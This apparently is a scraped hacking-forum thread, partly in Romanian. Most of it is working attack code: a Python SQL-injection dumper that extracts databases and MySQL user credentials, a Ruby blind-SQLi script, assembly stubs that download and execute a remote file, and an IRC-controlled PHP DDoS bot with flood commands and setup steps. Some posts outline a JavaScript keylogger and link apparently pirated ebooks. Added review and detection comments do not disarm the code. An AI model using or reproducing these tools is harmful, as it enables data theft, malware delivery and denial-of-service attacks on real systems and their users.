        line_URL += "+"+arg_where+"+"+arg_orderby
    # NOTE(review): version is a string (see `version[0] == str(4)` above),
    # so this int comparison is never true and the MySQL 4 URLs are dead code.
    if version[0] == 4:
        count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table
        line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table
elif mode == "--full":
    # Union only: every table_schema/table_name/column_name except
    # information_schema's own.
    print "[+] Starting full SQLi information_schema enumeration..."
    line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
    line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
    count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
    count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
elif mode == "--dbs":
    print "[+] Showing all databases current user has access too!"
    file.write("\n[+] Showing all databases current user has access too!")
    if arg_blind == "--blind":
        count_URL = site+"+and+((SELECT+COUNT(schema_name)"
        count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
        line_URL = site+"+and+ascii(substring((SELECT+schema_name"
        line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
    else:
        count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
        count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
        line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
        line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
    arg_row = "Databases"
# Common suffixes. NOTE(review): the blind --schema and --dbs count_URLs above
# already end in "))", so this appends a second "))" -- check the resulting
# query (or GuessValue's handling of it) actually balances. Also, for modes
# that set neither URL (--info/--fuzz/--findcol) this relies on count_URL /
# line_URL being pre-defined earlier in the file -- confirm.
if arg_blind == "--blind":
    count_URL+="))"
    line_URL+="+LIMIT+"
else:
    count_URL += arg_end
    line_URL += "+LIMIT+NUM,1"+arg_end

## Blind --info (the original author notes this block is oddly placed; it is
## kept here because the blind extraction loop below consumes its line_URL).
if mode == "--info" and arg_blind == "--blind":
    head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1"
    source = GetThatShit(head_URL)
    match = re.findall(arg_string,source)
    if len(match) >= 1:
        yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password"
    else:
        yesno = "NO"
    print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
    print "\n[+] Showing database version, username@location, and database name!"
    file.write("\n\n[+] Showing database version, username@location, and database name!")
    # Completed later as "...database())),<pos>,1))" -- one value, so one row.
    line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"
    row_value = 1

#Lets Count how many rows or columns
if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
    if arg_blind == "--blind":
        row_value = GuessValue(count_URL)
    else:
        source = GetThatShit(count_URL)
        match = re.findall("\x1e\x1e\S+",source)
        match = match[0][2:].split("\x1e")
        row_value = match[0]
    # NOTE(review): --full never assigns arg_row, so this relies on a default
    # set earlier in the file -- confirm.
    print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")

## UNION Schema Enumeration and DataExt loop -- fetch "LIMIT num,1" rows
## until table_num (tables seen for --schema/--full, rows for --dbs/--dump)
## reaches row_value. NOTE(review): for --full, row_value counts columns but
## table_num counts distinct tables, so the exit condition may never be met;
## and a row with no match (other than in --dump) just advances num with no
## upper bound -- errors are swallowed by the bare except.
if arg_blind == "--union":
    if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
        while int(table_num) != int(row_value):
            try:
                source = GetThatShit(line_URL.replace("NUM",str(num)))
                match = re.findall("\x1e\x1e\S+",source)
                if len(match) >= 1:
                    if mode == "--schema" or mode == "--full":
                        # fields: [db, table, column] after the two leading 0x1e.
                        match = match[0][2:].split("\x1e")
                        if cur_db != match[0]:
                            cur_db = match[0]
                            if table_num == 0:
                                print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n")
                            else:
                                print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n")
                            print "[Table: Columns]";file.write("[Table: Columns]\n")
                        if cur_table != match[1]:
                            print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2],
                            file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2])
                            cur_table = match[1]
                            #table_num+=1
                            table_num = int(table_num) + 1
                        else:
                            sys.stdout.write(",%s" % (match[2]))
                            file.write(","+match[2])
                            sys.stdout.flush()
                    #Gathering Databases only
                    elif mode == "--dbs":
                        match = match[0]
                        if table_num == 0:
                            print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
                        else:
                            print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
                        table_num+=1
                    #Collect data from tables & columns
                    elif mode == "--dump":
                        # Greedy match from the first 0x1e pair to the last;
                        # unlike \S+ above this keeps spaces inside values.
                        match = re.findall("\x1e\x1e+.+\x1e\x1e",source)
                        if match == []:
                            match = ['']
                        else:
                            match = match[0].strip("\x1e").split("\x1e")
                        if arg_rowdisp == 1:
                            print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",)
                        else:
                            print;file.write("\n")
                        for ddata in match:
                            if ddata == "":
                                ddata = "NoDataInColumn"
                            sys.stdout.write("%s:" % (ddata))
                            file.write("%s:" % ddata)
                            sys.stdout.flush()
                        table_num+=1
                else:
                    if mode == "--dump":
                        table_num+=1
                        sys.stdout.write("\n[%s] No data" % (num))
                        file.write("\n[%s] No data" % (num))
                        break
                num+=1
            except (KeyboardInterrupt, SystemExit):
                raise
            except:
                pass

## Blind Schema Enumeration and DataExt loop -- for each row (lim_num) walk
## character positions (let_pos) and ask GuessValue for the ascii() value
## until it returns 0 (end of string).
if arg_blind == "--blind":
    if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info":
        # Only upper_bound is read here (as the loop's initial sentinel);
        # lower_bound is presumably consumed by GuessValue via globals -- confirm.
        lower_bound = 0
        upper_bound = 127
        print
        # NOTE(review): row_value must be an int here (it is 1 for --info, and
        # whatever GuessValue returns otherwise); num/lim_num/let_pos start
        # from values set earlier in the file.
        for data_row in range(int(num), row_value):
            sys.stdout.write("[%s]: " % (lim_num))
            file.write("\n[%s]: " % (lim_num))
            sys.stdout.flush()
            value = chr(upper_bound)
            while value != chr(0):
                if mode == "--info":
                    Guess_URL = line_URL + str(let_pos)+",1))"
                else:
                    Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
                value = chr(GuessValue(Guess_URL))
                # NOTE(review): the terminating chr(0) is written too, so every
                # value ends with a NUL byte on the console and in the log file.
                sys.stdout.write("%s" % (value))
                file.write(value)
                sys.stdout.flush()
                let_pos+=1
            print
            lim_num = int(lim_num) + 1
            let_pos = 1
            data_row+=1    # no effect: the for-loop reassigns data_row each pass

#Lets wrap it up!
if mode == "--schema" or mode == "--full" or mode == "--dump":
    print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
else:
    print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
print "[-] Done\n";file.write("\n[-] Done\n")
print "Don't forget to check", logfile,"\n"
file.close()
  7. #MySQL Blind Inyection Tool #Coder => SH4V #n3t-datagrams.net require 'net/http' puts "host:" host=gets.chomp puts "extension:" ext=gets.chomp puts "columna:" col=gets.chomp puts "tabla:" tab= gets.chomp num="0" url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body corp2=http.get("#{url}333") corp2=corp2.body lon1=corp1.length lon2=corp2.length while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),2,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),3,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),4,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),5,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),6,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" 
while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),7,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),8,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),9,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),10,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),11,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),12,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),13,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),14,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body 
lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),15,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),16,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),17,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),18,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),19,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),20,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),21,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ 
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),22,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end
;Simple Downloader + Execute (1.50kb compiled)
;by iNs
;activespy.org
;
; Review notes (flat assembler, win32ax macros):
;  - Two-call "download and open" stub: URLDownloadToFile (urlmon.dll) writes
;    the remote file to a fixed path, then ShellExecute with a NULL verb opens
;    it with the default association for its extension. No return value is
;    checked, so a failed download still reaches ShellExecute.
;  - win32ax.inc's default import set does not obviously include urlmon;
;    confirm the .end macro resolves URLDownloadToFile in your FASM version.
;  - Detection: URLDownloadToFile immediately followed by ShellExecute on the
;    same path, hard-coded URL, file dropped at the C:\ root.
include 'win32ax.inc'
.code
inizio:
invoke URLDownloadToFile,NULL,"http://www.site.com/filetodownload.ext","C:\downloaded.txt",NULL,NULL ;download file
invoke ShellExecute,0,0,"C:\downloaded.txt",0,0,SW_SHOW ;run downloaded file
invoke ExitProcess,0
.end inizio
Download file in TempPath (2kb compiled) :
;Simple Downloader + Execute
;Save file in TempPath
; by iNs
; activespy.org
;
; Review notes:
;  - GetTempPath's documented signature is (nBufferLength, lpBuffer). Below
;    the first argument is Tmpdir's address, not its size, so the API is told
;    the buffer is as large as that address happens to be; it only works by
;    accident.
;  - lstrcpy TmpName <- Tmpdir copies the full temp path (up to 256 bytes)
;    into TmpName, an 8-byte buffer. TmpName and Tmpdir are adjacent in
;    .data, so the copy overruns TmpName into Tmpdir while still reading
;    from it (overlapping source/destination). Tmpdir already holds the
;    complete path after lstrcat.
;  - Same download / ShellExecute / exit sequence as above, plus a 3 s Sleep.
include 'win32ax.inc'
.data
TmpName db 'new.txt',0 ;8 bytes: 'new.txt' + NUL
Tmpdir rb 256d ;256chrs
.code
inizio:
invoke GetTempPath,Tmpdir,Tmpdir ;get temppath (first arg should be the length, see note)
invoke lstrcat,Tmpdir,TmpName ;append -> "<temp>\new.txt" in Tmpdir
invoke lstrcpy,TmpName,Tmpdir ;copy (overflows the 8-byte TmpName, see note)
invoke URLDownloadToFile,NULL,"http://www.site.org/a.txt",TmpName,NULL,NULL ;download file in temppath
invoke ShellExecute,0,0,TmpName,0,0,SW_SHOW ;run downloaded file
invoke Sleep,3000 ;sleep 3 seconds
invoke ExitProcess,0 ;quit
.end inizio
  9. Nytro

    PHP DDOS bot

Use: - Open mIRC (download: mirc.com) - Upload php_ddos_bot.php to your web server - Bot will join #yourchannel - PM the bot saying "ddos-udp IPHERE" - Enjoy.
<?php
/* PHP DDoS Bot Version 1.0 */
/*
 * Analysis notes (IRC-controlled flooder, documented here for detection and
 * incident-response purposes; nothing below is an endorsement of its use):
 *  - Command-and-control is hard-coded: IRC server $server:$Port, channel
 *    $Channel joined with key $Channelpass. Together with the nick pattern
 *    "bot-" + six digits and the registration line
 *    "USER cybercrime 0 * :woopie" these are usable network IOCs.
 *  - Commands are matched with eregi() against the whole raw IRC line, so
 *    any message containing the keyword -- from any sender, in channel or by
 *    PM -- triggers it; there is no operator authentication.
 *  - Arguments are taken positionally from $read2[4], [5], [6], i.e. the
 *    5th..7th space-separated tokens of the raw line (for a PRIVMSG:
 *    ":nick!user@host PRIVMSG <target> :<cmd> <arg4> <arg5> <arg6>").
 *  - eregi() was deprecated in PHP 5.3 and removed in 7.0, so this only runs
 *    on old PHP. set_time_limit(0) lets the web request live indefinitely: on
 *    a shared host it shows up as a long-running php process holding an
 *    outbound TCP connection to port 6667.
 */
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;                 // bare expression, no effect
$willekeurig=mt_rand(0,3);                 // assigned but never used
$nicknummer=mt_rand(100000,999999);        // random 6-digit nick suffix
$Channel="#WauShare";
$Channelpass="ddos";
$msg="Farewell.";                          // QUIT message for "bot-quit"
set_time_limit(0);
$loop = 0;
$verbonden = 0;                            // "connected" counter, only ever incremented
$verbinden = fsockopen($server, $Port);    // IRC control socket (no error check)
// Main read loop: one raw IRC line per iteration.
while ($read = fgets($verbinden,512)) {
    $read = str_replace("\n","",$read);
    $read = str_replace("\r","",$read);
    $read2 = explode(" ",$read);
    // Registration is sent on the first line received, whatever it is.
    if ($loop == 0) {
        fputs($verbinden,"nick $nick$nicknummer\n\n");
        fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
    }
    if ($read2[0] == "PING") {
        fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n");
    }
    // 251 = RPL_LUSERCLIENT, sent during registration; used as the
    // "registered, safe to JOIN" signal.
    if ($read2[1] == 251) {
        fputs($verbinden,"join $Channel $Channelpass\n");
        $verbonden++;
    }
    // Channel management commands: op/deop the nick in token 4, quit, join/part.
    if (eregi("bot-op",$read)) {
        fputs($verbinden,"mode $Channel +o $read2[4]\n");
    }
    if (eregi("bot-deop",$read)) {
        fputs($verbinden,"mode $Channel -o $read2[4]\n");
    }
    if (eregi("bot-quit",$read)) {
        fputs($verbinden,"quit :$msg\n\n");
        break;
    }
    if (eregi("bot-join",$read)) {
        fputs($verbinden,"join $read2[4]\n");
    }
    if (eregi("bot-part",$read)) {
        fputs($verbinden,"part $read2[4]\n");
    }
    // "ddos-udp <host>": one UDP socket to port 500 (ISAKMP), then a single
    // fputs of a string the loop tries to grow to ~1e13 bytes one byte at a
    // time -- in practice the process hits memory_limit and dies first. On
    // fsockopen failure the whole script exit()s.
    if (eregi("ddos-udp",$read)) {
        fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
        $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
        if (!$fp) {
            //echo "$errstr ($errno)<br>\n"; //troep
            exit;
        } else {
            $char = "a";
            for($a = 0; $a < 9999999999999; $a++)
                $data = $data.$char;
            if(fputs ($fp, $data) )
                fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
            else
                fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
        }
    }
    // "ddos-tcp <host> <port> <count>": opens <count> TCP connections and
    // never closes them. Note it overwrites $server/$Port and reassigns
    // $verbinden, the IRC control socket handle, to the last flood socket.
    if (eregi("ddos-tcp",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
        $server = $read2[4];
        $Port = $read2[5];
        for($sockets = 0; $sockets < $read2[6]; $sockets++) {
            $verbinden = fsockopen($server, $Port);
        }
    }
    // "ddos-http <host> <port> <count>": <count> sequential GET / requests
    // with a fixed MSIE 6 User-Agent and "Accept-Language: nl", each on a
    // fresh connection closed immediately -- a simple signature to match.
    if (eregi("ddos-http",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
        $Webserver = $read2[4];
        $Port = $read2[5];
        $Aanvraag = "GET / HTTP/1.1\r\n";
        $Aanvraag .= "Accept: */*\r\n";
        $Aanvraag .= "Accept-Language: nl\r\n";
        $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
        $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
        $Aanvraag .= "Host: $read2[4]\r\n";
        $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
        for($Aantal = 0; $Aantal < $read2[6]; $Aantal++) {
            $DoS = fsockopen($Webserver, $Port);
            fwrite($DoS, $Aanvraag);
            fclose($DoS);
        }
    }
    $loop++;
}
?>
  10. Ubuntu on a Dime: The Path to Low-Cost Computing Paperback: 280 pages Publisher: Apress; 1 edition (June 8, 2009) Language: English ISBN-10: 1430219726 ISBN-13: 978-1430219729 Format: PDF Description: You know that Ubuntu software costs nothing. Now you want the PC system that costs as little as possible and runs Ubuntu and OS applications without complaints and calls to tech support. So you spend your hard–earned dollars on the hardware only and have your own optimized Ubuntu PC. This is the book that will show you how to get what you need without wreaking havoc on your finances. Put together the parts to make a great work computer for little cost. Packed with the practical, hands–on guidance and technical know–how that you’ve come to expect from Apress, Ubuntu on a Dime takes you on a tour of the very best, but low–cost hardware, while only using zero–cost software in each of the many categories that matter to the typical PC user. You’ll learn how to find the best and cheapest hardware, and how to put it together to make a working PC. Learn to edit photos on the Internet without having to install any software at all. Find out where to get a free office suite for word processing and spreadsheet work. Whatever your need, James Kelly, best–selling technology author, guides you through the exciting and often confusing world of zero–cost computing. This book Takes you step–by–step through a PC build Tells you what you need to install to have a fantastic work computer without spending a dime Saves you money by showing you how to meet your computing needs Saves you time by pointing you directly to the best free software Saves you work by illustrating the most commonly performed tasks with each zero–cost software Gives you choices and the ability to make your own decisions for your own needs and requirements Before you go buy that $900 dollar computer and that $400 office suite—or worse, before you “borrow” it from work—stop! 
Let this inexpensive book show you how to save hundreds of dollars in expensive software, and never depend on the big PC providers and their tech support again. Learn all about cheap, but fast hardware, find out about the free tools that the digerati use to make their lives better, and stop paying out the nose. Don't spend a dime! What you’ll learn Source, buy, and put together the best hardware to make a cheap PC optimized for Ubuntu Linux. Find and install the best zero–cost software available. Learn about software as a service and take advantage of photo editing, calendaring, e-mail, and other functionality delivered at no cost via the Web. Harness the power of OpenOffice and Google Apps for your word processing, spreadsheet, presentation needs. Communicate with your friends through zero–cost voice calls, e-mail, and instant–messaging. Establish a presence on the Web through blogs and social networking sites such as Facebook. Download: http://www.file2box.com/htebxx7uuuiy Ubuntu Linux Secrets Paperback: 840 pages Publisher: Wiley (April 13, 2009) Language: English ISBN-10: 0470395087 ISBN-13: 978-0470395080 Format: PDF Description: The everyday Linux user can easily get overwhelmed by the complexity of the new software that exists when creating an Ubuntu system. This book covers the basics of creating a new system from scratch and explains what software is installed. You’ll take a tour of installing the Ubuntu Linux distribution system in most environments, including nontraditional situations such as dual-boot and text-based installations. Plus, clear explanations of each of the installed applications show you how to get the most out of each application, rather than simply using them as they exist. 
Download: http://www.file2box.com/e2rgzswf67ii Ubuntu Pocket Guide and Reference: A concise companion for day-to-day Ubuntu use Paperback: 166 pages Publisher: CreateSpace (January 19, 2009) Language: English ISBN-10: 1440478295 ISBN-13: 978-1440478291 Format: PDF Description: Ubuntu Pocket Guide and Reference is a compact yet comprehensive guide for everyday Ubuntu use, written by the award-winning and best-selling Ubuntu author Keir Thomas. First, you'll learn about installation--getting Ubuntu onto your computer--after which you'll learn how to configure your computer's hardware. Following this, you'll be introduced to the Ubuntu desktop, and the tricks and techniques of efficient day-to-day usage. The book then describes the highways of the Ubuntu filesystem, and gives a full run-down of the Ubuntu file manager. Next, the command-line is tackled in-depth, after which software management is explained. Finally, system security is described. Appendixes provide a glossary, and a guide to technical documentation. Written for anybody switching to Ubuntu, particularly Windows users, Ubuntu Pocket Guide and Reference assumes zero Linux knowledge and conveys expert knowledge. Download: http://uploading.com/files/EKSFHYNM/9781440478291-1440478295.rar.html Pro Ubuntu Server Administration Paperback: 424 pages Publisher: Apress; 1 edition (December 2, 2008) Language: English ISBN-10: 1430216220 ISBN-13: 978-1430216223 Format: PDF Description: Pro Ubuntu Server Administration teaches you advanced Ubuntu system building. After reading this book, you will be able to manage anything from simple file servers to multiple virtual servers to high–availability clusters. This is the capstone volume of the Apress Ubuntu trilogy that includes Beginning Ubuntu Linux, Third Edition and Beginning Ubuntu Server LTS Administration: From Novice to Professional, Second Edition. 
You will be able to make Ubuntu technology shine in a Fortune–500 environment and let Ubuntu server become the backbone of your infrastructure. Topics covered include Performance monitoring and optimization High–availability clustering Advanced LDAP integrated networking What you’ll learn Monitor Ubuntu Server software and the hardware it is running on. Make Ubuntu Server fly by careful optimization. Learn how to craft high–availability clusters. Ease your way into large–scale LDAP networking. Acquire the skills to adjust Ubuntu Server to the security needs of a Fortune–500 environment. Run your own Ubuntu application server. Download: http://uploading.com/files/9SAV2IQS/9781430216223-1430216220.rar.html Ubuntu Linux Toolbox: 1000+ Commands for Ubuntu and Debian Power Users Publisher: Wiley Language: English ISBN: 0470082933 Paperback: 332 pages Data: November 28, 2007 Format: PDF Description: Aimed squarely at aspiring Linux power users and professional administrators, the Ubuntu Linux Toolbox offers more than 1000 examples of useful Linux command lines. This compact, handy reference is made to carry with you, whether you are maintaining hundreds of Linux systems or just want to dig beneath the surface of your Ubuntu desktop system. This is the Linux reference book you need to step up to the next level. Download: http://www.paid4share.net/file/4056/0470082933-rar.html Linux Bible 2009 Edition: Boot up Ubuntu, Fedora, KNOPPIX, Debian, openSUSE, and more Paperback: 888 pages Publisher: Wiley; Pap/Dvdr/C edition (January 14, 2009) Language: English ISBN-10: 0470373679 ISBN-13: 978-0470373675 Format: PDF Description: As the ultimate resource on the basics of the Linux desktops, servers, and programming tools, this book is written by the ultimate author on all things Linux. 
This transition resource is ideal if you are making the move from Windows or Macintosh to using Linux as your desktop system, and explains the Linux technology, offers detailed installation instructions, and includes step-by-step descriptions of key desktop and server components. You’ll relish the in-depth descriptions that will help you choose the best Linux distribution to suit your needs. Download: http://www.file2box.com/u6bkgeldn72x Pro Linux System Administration Paperback: 1080 pages Publisher: Apress; 1 edition (June 22, 2009) Language: English ISBN-10: 1430219122 ISBN-13: 978-1430219125 Format: PDF Description: We can all be Linux experts, provided we invest the time in learning the craft of Linux administration. Pro Linux System Administration makes it easy for small to medium–sized businesses to enter the world of zero–cost software running on Linux and covers all the distros you might want to use, including Red Hat, Ubuntu, Debian, and CentOS. Authors, and systems infrastructure experts James Turnbull, Peter Lieverdink, and Dennis Matotek take a layered, component–based approach to open source business systems, while training system administrators as the builders of business infrastructure. If you want to implement a SOHO or SMB Linux infrastructure, Pro Linux System Administration clearly demonstrates everything you need. You’ll find this book also provides a solid framework to move forward and expand your business and associated IT capabilities, and you’ll benefit from the expertise and experienced guidance of the authors. Pro Linux System Administration covers An introduction to using Linux and free and open source software to cheaply and efficiently manage your business A layered model that allows your infrastructure to grow with your business Easy and simple–to–understand instructions including configurations, examples, and extensive real–world hints and tips Download: http://www.file2box.com/0i51y2fm5xur
  11. Nu cred, incearca si tu mai multe chestii: Pune html-ul intr-un iframe si incearca sa scrii in pagina cu iframe sau altele... Nu am testat.
  12. Logic. Keypress-urile trebuie sa le primeasca browserul, js-ul captureaza acestea si le trimite prin AJAX la PHP loggerul care le scrie in fisier.
  13. Block ciphers (reviewer note: DES, RC4, Skipjack and TEA on this list are obsolete or have practical attacks and should not be used in new designs; prefer Rijndael/AES, Twofish or Serpent in an authenticated mode — and since these appear to be hobbyist class ports, check each one against the published test vectors before trusting it): Blowfish: http://www.2shared.com/file/7104480/65a1678f/clsBlowfish.html DES: http://www.2shared.com/file/7104489/1c7ddf2b/clsDES.html Gost: http://www.2shared.com/file/7104491/bbd6658/clsGost.html RC4: http://www.2shared.com/file/7104496/95d9f3fb/clsRC4.html Rijndael: http://www.2shared.com/file/7104500/acba87b0/clsRijndael.html Serpent: http://www.2shared.com/file/7104509/d5663f14/clsSerpent.html Skipjack: http://www.2shared.com/file/7104514/b2cc72e8/clsSkipjack.html TEA: http://www.2shared.com/file/7104518/bb7a3ec3/clsTEA.html Twofish: http://www.2shared.com/file/7104521/e98bd5a4/clsTwofish.html + Huffman ( Compression algorithm ): http://www.2shared.com/file/7104536/6ef47146/clsHuffman.html Hash algorithms (MD5 and SHA-1 are no longer collision-resistant; prefer SHA256 where collision resistance matters): MD5: http://www.2shared.com/file/7104551/a6ca4363/clsMD5.html SHA: http://www.2shared.com/file/7104557/4fa9e656/clsSHA.html SHA256: http://www.2shared.com/file/7104554/d6a0b7ec/clsSHA256.html ALL: http://www.a1vbcode.com/download.asp?ID=1438
